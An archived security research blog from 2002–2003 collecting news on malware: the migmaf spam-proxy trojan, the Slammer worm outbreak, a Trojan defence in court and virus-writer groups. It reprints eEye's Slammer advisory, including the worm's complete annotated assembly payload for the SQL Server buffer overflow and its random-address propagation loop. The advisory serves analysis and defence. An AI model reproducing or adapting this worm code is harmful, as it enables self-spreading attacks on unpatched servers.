disLEXia

Tuesday, 22. July 2003

RECHNER-HIJACKING

Spam- und Porno-Server wider Willen

"migmaf" ist kein Trojaner wie all die anderen: Das wahrscheinlich seit Anfang Juni im Umlauf befindliche Schadprogramm kidnappt unbemerkt Rechner und macht sie zum Server für Spam und Pornoseiten.

Der Fluch des Web: Spam macht E-Mail zunehmend unbrauchbarer

Echte Hacker sehen auf die Viren-schreibenden pubertären Skript-Kiddies nur hinab. Für sie scheidet sich die hackende Community in nur zwei ernst zu nehmende Lager: Die Hacker oder Whitehats auf der einen und die Cracker oder Blackhats auf der anderen Seite. Die einen sehen sich als die Helden von Digitalien, die anderen sind kriminell.

Das jedoch heißt nicht, dass sie keine Programme schreiben könnten, die Hackern wie IT-Sicherheitsexperten Respekt abnötigen. Bei "migmaf" etwa, sagte der IT-Experte Richard Smith der "PC World", habe er zunächst nur eines gedacht: "Wow! Das ist interessant!"

P2P-Spamnetz

Denn migmaf, scheinbar zunächst nicht mehr als einer der üblichen, vielen Hundert lästigen Trojaner, entpuppte sich schnell als etwas Außergewöhnliches.

Wahrscheinlich seit Anfang Juni ist der Schädling unterwegs und befiel seitdem nur einige Tausend Rechner. Das ist zunächst nicht viel - aber mehr will das Virus anscheinend auch gar nicht.

Denn migmaf kredenzt seinen Kontrolleuren - wahrscheinlich russischen Crackern - einen Zugang zum befallenen Rechner. Die vollenden dann die Installation eines für das Opfer kaum zu bemerkenden Proxy-Servers: Das Opfer wird zum Teil des Crack-Netzwerkes - und in den Augen vieler hundertausend danach bespamter E-Mail-Kontenbesitzer zum Täter.

Denn migmaf vollbringt eine alles andere als triviale Leistung: Er verteilt Spam-Mails über "sein" Netzwerk, die den User zu einer pornografischen Website führen sollen. Doch die hat zwar eine fixe Adresse, aber keinen "Ort" im Internet: Alle paar Minuten wechselt sie scheinbar die IP-Adresse.

Denn letztlich installiert migmaf nichts anderes als die kriminelle Karikatur eines P2P-Netzwerkes: Von einem zentralen Server aus "senden" seine Programmierer ihre Pornoseiten aus, die dann in stetem Wechsel über die

DER SPIEGEL

Durchgezählt: Spam-Mail-Aufkommen nach Kategorien

unfreiwilligen Proxyserver der von migmaf befallenen Rechner "wandern". Mit migmaf wird also wirklich und endlich jeder ein Sender - ob er nun will oder nicht.

Damit baut migmaf nicht nur eine außerordentlich hohe Kapazität für den Versand von Spam auf, sondern verwischt auch relativ effektiv die Spuren zum wirklichen Verursacher.

Schutz vor Entdeckung

Doch es geht noch weiter. Um die Porno-Websites "wandern" lassen zu können, installiert migmaf ein kleines DNS-System auf den befallenen Rechnern. Keiner der gekidnappten Rechner "sendet" für mehr als zehn Minuten Pornoseiten aus - in diesem Takt wechseln sich die "Sender" ab. Solange es davon genug gibt, fällt der Mehrverkehr wahrscheinlich noch nicht einmal den Serviceprovidern auf, was in diesem Falle sogar wünschenswert wäre: Normalerweise kommt es bei massivem Mehrverkehr zu einer Warnung oder Verwarnung durch den Serviceprovider.

Sicherheitsexperten gehen davon aus, dass es bereits mehrere Versionen des Virus gibt, die großen Virenschutz-Entwickler arbeiten an Programmen, migmaf und ähnliche Programme zuverlässig erkennen zu können. Bis dahin bleibt nur die Mahnung vor allem an die Nutzer von DSL-Leitungen, diese nie ohne eine gut funktionierende Firewall zu betreiben. Die kann zumindest verhindern, das migmaf "auf Sendung" geht.

Denn zumindest die Frage, was all das für einen Sinn haben soll, war sehr schnell erklärt: migmaf leistet nichts anderes als den Aufbau eines P2P-Netzwerkes ausschließlich zur Verteilung von Spam. Und weil diese nicht von einem, sondern von Tausenden ständig wechselnden Servern verteilt werden, hat es die Spamfilter-Software schwer, mitzuhalten.

Pyrrhussieg

Sicherheistexperten des US-Unternehmens LURHQ gelang es Ende letzter Woche, das erste nachgewiesene migmaf-Netzwerk stillzulegen. Keine leichte Aufgabe: Die Experten berichteten, dass sie für IP-Rückverfolgungen, für die sie normalerweise wenige Minuten brauchten, satte sieben Tage gebraucht hätten. Selbst dann könnten sie sich nicht sicher sein, ob sie wirklich den "Master-Server" gefunden haben, oder nur das erste der Opfer in einer Kette von Tausenden.

Eines aber scheint klar: Prinzipiell lassen sich migmaf-Trojaner mit Hilfe jedes Virus ausliefern, und ungezählte migmaf-Spamnetze ließen sich parallel betreiben.

migmaf ist also die Antwort der Spam-Mafia auf die Versuche, dem Werbemüll endlich den Hahn abzudrehen. Sieht so aus, als würde das noch schwerer als gedacht: Schöne Aussichten sind das nicht.

Frank Patalong
09:12 | permanent link | mail this

Wie Trojanische Pferde fremde PCs zu willenlosen Spam-Monstern machen

Wie Trojanische Pferde fremde PCs zu willenlosen Spam-Monstern machen

In Russland angesiedelte Spammer () verbreiten ihren elektronischen Müll seit einiger Zeit mit einer neuen hinterhältigen Methode: Sie schmuggeln Trojanische Pferde auf Rechner unwissender Opfer, die Massen-Mails aussenden und als Host () für Porno-Inhalte dienen. Sicherheitsexperten bekamen erste Hinweise auf das illegale Treiben bereits Ende Juni, sagte Joe Stewart, Analyst beim Security-Spezialisten Lurhq. Damals waren Massen-Mails unter anderem mit Angeboten russischer Porno-Sites aufgefallen, die alle paar Minuten von einem anderen Absender ausgingen.

HACKER VERWENDEN IP-ADRESSE () DER OPFER UM () IHRE ZU VERSTECKEN Das "Migmaf" (Migrant Mafia) genannte Trojanische Pferd dient als eine Art Proxy-Server, über den die Spammer ihre wahre Herkunft verschleiern. Einerseits ersetzt es die Original-Adresse durch die IP-Adresse des infizierten Rechners, andererseits schleust es die pornografischen Inhalte über den Rechner, wenn ein Spam-Empfänger auf einen Link () in der Massen-Mail klickt. Um die Spuren weiter zu verwischen, werden infizierte PCs immer nur für kurze Zeit eingesetzt, so die Experten.

ANSTECKEN KANN MAN () SICH QUASI ÜBERALL Auf welchem Weg die Spammer den Schädling verbreiten, ist noch nicht bekannt. Laut Stewart ist ein Wurm () als Träger ebenso möglich wie ein manipuliertes ActiveX-Control. Auch könnten infizierte Dateien in Online-Tauschbörsen wie Kazaa () eingeschleust oder via IRC () (Internet Relay Chat) auf die Rechner gebracht worden sein. (idg/oli)
08:59 | permanent link | mail this

Tuesday, 22. April 2003

The Trojan did it - Possession of child pornography

http://www.theinquirer.net/?article=9023 A MAN ACCUSED of having pornographic pictures of children on his PC was acquitted yesterday after a court heard that his machine was infected with a Trojan on his PC which probably auto-downloaded the images. The acquittal followed expert testimony that said an examination of the hard drive belonging to Karl Schofield was infected with the Trojan and that was responsible for the downloads, an argument accepted by the prosecution service in Reading, in the UK.

Mr Schofield had denied making indecent images and claimed the Trojan might have infected his PC either through email or from pop up adverts. The expert testified that the Trojan arrived on Mr Schofield's system the day before the images appeared. In the run up to the case, according to the Reading Evening Post, Mr Schofield suffered vigilante attacks and had to first hide in his home then move away to avoid continued attacks.

[via CYBERIA-L]
16:22 | permanent link | mail this

Monday, 27. January 2003

SQL Sapphire Worm Analysis

Forwarded from: "Marc Maiffret" <marc@eeye.com>

SQL Sapphire Worm Analysis

Release Date:
1/25/03

Severity:
High

Systems Affected:
Microsoft SQL Server 2000 pre SP 2

Description:
Late Friday, January 24, 2003 we became aware of a new SQL worm
spreading quickly across various networks around the world.

The worm is spreading using a buffer overflow to exploit a flaw in
Microsoft SQL Server 2000. The SQL 2000 server flaw was discovered in
July, 2002 by Next Generation Security Software Ltd. The buffer
overflow exists because of the way SQL improperly handles data sent to
its Microsoft SQL Monitor port. Attackers leveraging this
vulnerability will be executing their code as SYSTEM, since Microsoft
SQL Server 2000 runs with SYSTEM privileges.

The worm works by generating pseudo-random IP addresses to try to
infect with its payload. The worm payload does not contain any
additional malicious content (in the form of backdoors etc.); however,
because of the nature of the worm and the speed at which it attempts
to re-infect systems, it can potentially create a denial-of-service
attack against infected networks.

We have been able to verify that multiple points of connectivity on
the Internet have been bogged down since 9pm Pacific Standard Time.

It should be noted that this worm is not the same as an earlier SQL
worm that used the SA/nopassword SQL vulnerability as its spread
vector. This is a new worm is more devastating as it is taking
advantage of a software-specific flaw rather than a configuration
error. We have already had many reports of smaller networks brought
down due to the flood of data from the Sapphire Worm trying to
re-infect new systems.

Corrective Action

We recommend that people immediately firewall SQL service ports at all
of their gateways. The worm uses only UDP port 1434 (SQL Monitor Port)
to spread itself to a new system; however, it is safe practice to
filter all SQL traffic at all gateways. The following is a list of
SQL server ports: ms-sql-s 1433/tcp #Microsoft-SQL-Server ms-sql-s
1433/udp #Microsoft-SQL-Server ms-sql-m 1434/tcp
#Microsoft-SQL-Monitor ms-sql-m 1434/udp #Microsoft-SQL-Monitor

Once again this worm is taking advantage of a known vulnerability that
has had a patch available for many months. Microsoft has also released
a recent service pack for SQL (Service Pack 3) that includes a fix for
this vulnerability.

Standalone patch:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/MS02-039.asp

SQL 2000 Service Pack 3:
http://www.microsoft.com/sql/downloads/2000/sp3.asp

Previous SQL Service Pack versions are vulnerable.

Technical Description

The following is a quick run-down of what the worm's payload is doing after
infection:

1. Retrieves the address of GetProcAddress and Loadlibrary from the
IAT in sqlsort.dll. It snags the necessary library base addresses and
function entry points as needed.
2. Calls gettickcount, and uses returned count as a pseudo-random seed
3. Creates a UDP socket
4. Performs a simple pseudo random number generation formula using the
returned gettickcount value to generate an IP Address that will later
be used as the target.
5. Send worm payload in a SQL Server Resolution Service request to the
pseudo random target address, on port 1434 (UDP).
6. Return back to formula and continue generating new pseudo random
addresses.


push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h ; Reconstruct session, after the
overflow the payload buffer
; get's corrupted during program
execution but before the
; payload is executed. .
xor ecx, ecx
mov cl, 18h

FIXUP:
push eax
loop FIXUP
xor eax, 5010101h
push eax
mov ebp, esp
push ecx
push 6C6C642Eh
push 32336C65h
push 6E72656Bh ; kernel32
push ecx
push 746E756Fh ; GetTickCount
push 436B6369h
push 54746547h
mov cx, 6C6Ch
push ecx
push 642E3233h ; ws2_32.dll
push 5F327377h
mov cx, 7465h
push ecx
push 6B636F73h ; socket
mov cx, 6F74h
push ecx
push 646E6573h ; sendto
mov esi, 42AE1018h ; IAT from sqlsort
lea eax, [ebp-2Ch] ; (ws2_32.dll)
push eax
call dword ptr [esi] ; call loadlibrary
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-10h] ; (kernel32.dll)
push eax
call dword ptr [esi] ; loadlibrary
push eax
mov esi, 42AE1010h ; IAT from sqlsort
mov ebx, [esi]
mov eax, [ebx]
cmp eax, 51EC8B55h ; check entry point fingerprint
jz short VALID_GP ; Check entry point fingerprint for
getprocaddress, if it failes
; fall back to GetProcAddress entry
in another DLL version.
; Undetermined what dll versions
this will succedd on. Due
; to the lack of reliable importing
this may not work across all
; dll versions.
mov esi, 42AE101Ch ; IAT entry -> 77EA094C

VALID_GP:
call dword ptr [esi] ; GetProcAddress
call eax ; return from GetProcaddress =
GetTickCount entrypoint
xor ecx, ecx
push ecx
push ecx
push eax
xor ecx, 9B040103h
xor ecx, 1010101h
push ecx ; 9A050002 = port 1434 / AF_INET
lea eax, [ebp-34h] ; (socket)
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
push 11h
push 2
push 2
call eax ; socket
push eax
lea eax, [ebp-3Ch] ; sendto
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
mov esi, eax ; save sendto -> esi
or ebx, ebx
xor ebx, 0FFD9613Ch

PRND:
mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx ; Pseudo Random Algorithm End
mov [ebp-4Ch], eax
push 10h
lea eax, [ebp-50h]
push eax
xor ecx, ecx
push ecx
xor cx, 178h
push ecx
lea eax, [ebp+3]
push eax
mov eax, [ebp-54h]
push eax
call esi ; sendto
jmp short PRND ; Jump back to Pseudo Random Algorithm
Start

In Closing
We have provided brief information here as we are currently working to
understand more of the worm's internal behavior. We will provide
updates as they become available.

This worm has been dubbed the "Sapphire Worm" by eEye due to the fact
that several engineers had to be pulled away from local bars to begin
the investigation/dissection process.

Credit:
Riley Hassell

Related Links:
SQLSecurity.com
http://sqlsecurity.com/

Microsoft Security Bulletin:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/ms02-039.asp

Copyright (c) 1998-2003 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
info@eEye.com [isn]
09:03 | permanent link | mail this

Massive Network Attack was a deliberate attack against South Korea

• Internet Weather Report [lawrence's notebook]
• Fresh warning over cyber attack [moreover Computersecurity]
• How a computer hacker and an internet virus called Slammer gave the worldwide web a serious cold [moreover Computersecurity]
• Massive Network Attack was a deliberate attack against South Korea [Securitynewsportal]
• Virus-like attack hits web traffic - http://news.bbc.co.uk/2/hi/technology/2693925.stm
• Hackers crash Net services in S Korea - http://economictimes.indiatimes.com/cms.dll/html/uncomp/articleshow?artid=35478944
• Hackers Crash Internet Services in S.Korea - http://news.cnet.com/investor/news/newsitem/0-9900-1028-20818169-0.html?tag=ats

Mobile code on the loose - worms break the internet again.

• Asia Scrambles to Recover From Internet Computer Worm [moreover Computersecurity]
• CA-2003-04: MS-SQL Server Worm [CERT/CC]
• Computer virus 'worm' triggers worldwide Internet trouble [moreover Computersecurity]
• Countries recovering from worm attack [moreover Computersecurity]
• Internet crisis as speedy 'worm' wriggles in [moreover Computersecurity]
• Iraqi Oil worm spreads over the Net [The Register - security]
• Latest computer worm exposes reactionary nature to security flaws [moreover Computersecurity]
• MS SQL Worm Might Be Responsible for Internet Woes [moreover Computersecurity]
• MS SQL Worm Roundup [Help Net Security]
• New Microsoft SQL Sapphire Worm [NETSYS.COM]
• Other Microsoft programs might also be at risk for Web worm [Securitynewsportal]
• S.Korea Races to Erase Web Worm [moreover Computersecurity]
• SQL Server Worm Slows Internet Traffic To A Crawl [TechWeb: Security]
• SQL Slammer worm wreaks havoc on Internet [moreover Computersecurity]
• SQL Worm Overwhelms Global Internet Systems over the night [Securitynewsportal]
• SQL worm hits [Help Net Security]
• SQL worm taxing the net [Kill-HUP.com]
• SQLSlammer -- winziger Wurm erzeugt riesigen Internet-Traffic [heise]
• Schwere DDOS-Attacke auf Microsoft SQL Server [newsBYTE.ch]
• Update: 'Slammer' worm slugs Internet, slows Web traffic [Computerworld]
• VORSICHT: Neuer Wurm attackiert SQL Server [ComputerWoche: Nachrichten]
• Web Worm Exposes Security Flaws [moreover Computersecurity]
• Worm Attack Shows Inadequacy of Security [moreover Computersecurity]
• Wurm legt Teile des Internet lahm [heise]

Saturday, 25. January 2003

Concerns Raised as Virus Writers Publish E-Zine

A group of hackers described as "prolific" virus writers by one analyst has published its first e-zine, raising concerns that the portal will fuel a new wave of malicious code and virus variants. According to security intelligence firm iDEFENSE, hackers who call themselves GEDZAC, or Zoneavirus, recently published the 'zine, titled Mitosis, which contains source code for a dozen viruses and tips, such as how to avoid detection by antivirus software. Ken Dunham, a senior intelligence analyst at iDEFENSE, says the fact that the group is organized enough to publish the 'zine is significant. "Most malicious coding groups fall apart or fail to progress to that level," Dunham says.

Dunham says the code will "invariably be used by a script-kiddie or individual learning how to create malicious code," likely resulting in faster development of new variants and "powerful blended threats." The new 'zine joins a growing list of publications, such as 2600 and Phrack, written for and by the hacker community. "The point to recognize is that the hacker community is more organized than most people realize," says Jon Ramsey, head of development at SecureWorks, a network intrusion detection and monitoring firm. Others see value for security professionals in the 'zines. "It's a classic tradeoff," says Ed Skoudis, VP of security strategy at consulting firm Predictive Systems. "They spread ideas among the bad guys and the not-so-elite bad guys, but they also let us good guys know what they're up to. All in all, it's kind of valuable." [Securitynewsportal]

http://www.infosecuritymag.com/2003/jan/digest23.shtml#news4
10:53 | permanent link | mail this

Tuesday, 03. December 2002

Virus payloads bigger, nastier

IDGNet New Zealand Dec 2 2002 7:32PM ET [moreover Computersecurity]
07:46 | permanent link | mail this

Saturday, 23. November 2002

Next virus attack to cost SMEs billions

Research has revealed that the financial loss to SME's when the next big computer virus hits could be billions

The next big computer virus attack could cost the UK's small and medium-sized enterprises (SMEs) £2.1bn, according to research carried out by McAfee Security.

The research showed that of the 70 percent of SMEs who said they had received a virus, all had lost money and suffered systems downtime as a result.

The average financial loss was £843 per company, equating to a total of £2.1bn, and the average downtime was 7.2 hours -- almost a full working day.

Nearly all the survey respondents agreed that cybercrime is on the increase (91 percent), but 12 percent still have no virus protection in place. Nearly half (43 percent) have no firewall protection from hackers.

Peter Scargill, IT chairman of the Federation of Small Businesses, said: "Many SMEs agree that cybercrime is a serious issue but fail to protect all of their computers or update protection regularly. Viruses or hacker attacks could be disastrous for many SMEs. They must start putting protection in place."

The survey also revealed that many SMEs do not subscribe to the generally accepted rule that prevention is better than cure, and wait until they are infected by a virus before taking action to address their vulnerability.

A third of respondents (32 percent) bought virus protection after they'd been infected by a virus.

Marc Vos, European product manager for McAfee Security, said: "It is very important that SMEs protect themselves against cyber crime properly. Although many have protection, it is useless unless they keep it regularly up-to-date."

He added: "Viruses tend to grab the news headlines but SMEs are often left wide open to other forms of cybercrime such as fraud or hacking. These threats are especially hazardous for high speed Internet users who are always connected and therefore always open to attack."

ZDNet Nov 22 2002 11:49AM ET [moreover Computersecurity]
09:21 | permanent link | mail this

Thursday, 21. November 2002

War with Iraq will mean virus outbreak, hacker says

A Malaysian virus writer who is sympathetic to the cause of the al-Qaeda terrorist group and Iraq and who has been connected to at least five other malicious code outbreaks is threatening to release a megavirus if the U.S. launches a military attack against Iraq...

Melhacker confirmed earlier reports by Chantilly, Va.-based iDefense Inc. that he has developed and tested a "three-in-one" megaworm code-named Scezda that combines features from the well-known SirCam, Klez and Nimda worms. [The Hacktivist]
21:35 | permanent link | mail this

Computer Virus Families: Origins and Differences

Klez.F and Klez.I or Opaserv, Opaserv.D and Opaserv.H are just some examples of malicious code which due to common characteristics and roots are grouped into families by the antivirus industry. "The biggest families like I Love You or the veteran Marker can have as many as 60 variants," explains Luis Corrons, Virus Laboratory Director at Panda Software.

Sometimes a new variant of malicious code originates from another virus which has been modified. On other occasions, the authors of the virus create them using the basic features that define a family of viruses as a type of template. For this reason, some malicious code come in a series, behaving basically in the same way with only minimal differences such as the subject of the e-mail they arrive in or their ability to carry out certain actions, as the examples below illustrate:

Variants "I" and "F" of Klez: both are spread through e-mail and take advantage of the same vulnerability detected in the Internet Explorer navigator (corrected by Microsoft), which makes it possible to execute the attached file automatically when viewed in the Preview Pane. The versions differ in the following ways:

Klez.I is sent in an e-mail message with text and has two attached files. The objective of this malicious code is to stop certain processes and erase files in infected computers.

Klez.F: is sent in an e-mail with no text and includes only one attached file. It modifies some of the system controls (preventing the system from starting up correctly) and overwriting executable files, rendering them useless.

W32/Opaserv and W32/Opaserv.D are able to spread through networks and they attempt to access a web page to update some of their components. In order to infect, both worms create SCRSVR.EXE in the Windows directory, which contains their infection code. In addition W32/Opaserv.D generates the file TMP.INI in the root directory of the hard drive and enters an instruction in WIN.INI to activate the worm.

Opaserv.H is different in that the file that contains it comes in different sizes and is compressed with the PCShrink utility, which encrypts the code that causes the infection. The "J" variant of Opaserv has the ability to create various files in the infected computer. Among them "INSTIT.BAT", copies the worm that contains the infection code. "GUSTAV.SAT" and "INSTITU.VAT" are generated to exchange information with the web page they connect to.

I love you: variants differ, principally in the characteristics of the messages that are sent. The names of the attached files, the web pages they connect to and the file extensions which they affect, are all variable. The appearance within just a few hours of successive variants contributed greatly to their ability to spread.

Corrons also explained how, "Some variants still manage to spread, even though for some time now antivirus solutions have been available to detect and neutralize them." One example is the "I" variant of Klez, which appeared in April and still remains the most damaging malicious code affecting users over the past seven months, according to data collected by Panda ActiveScan. [Help Net Security]
14:04 | permanent link | mail this

Wednesday, 13. November 2002

Welsh Web designer charged with virus writing, child porn offences

By John Leyden

A 21-old Welsh Web designer has appeared in court charged with creating and distributing three mass mailer viruses.

Simon Vallor, of Llandudno, North Wales, also faced charges relating to the possession of indecent images of children in an appearance before Bow Street Magistrates Court last Friday (November 8). The appearance follows his arrest on suspicion of creating the Gokar, Redesi and Admirer mass mailing viruses.

Acting on information received from the FBI's Baltimore field office, Valler was arrested on February 14 this year and charged with offences under section three of the Computer Misuse Act 1990. His computer was seized during this arrest, and its subsequent examination - allegedly - uncovered child porn.

North Wales police were assisted in their investigation by officers from Scotland Yard&146;s specialist Computer Crime Unit. [The Register]
12:16 | permanent link | mail this

Tuesday, 22. October 2002

Bugbear hugs?

The recent Bugbear epidemic recently had pleasant repercussions for a colleague. An e-mail they had sent to an external business, which later became infected with the virus, was chosen for mass circulation. It ended up in many people's inboxes, one of whom turned out to be an old university friend. They had lost contact over the years, and thanks to the virus, now they're back in touch. ["Justin Macfarlane" <Justin.Macfarlane@lafferty.com> via risks-digest Volume 22, Issue 32]
09:44 | permanent link | mail this

disLEXia, a research project by Maximillian Dornseif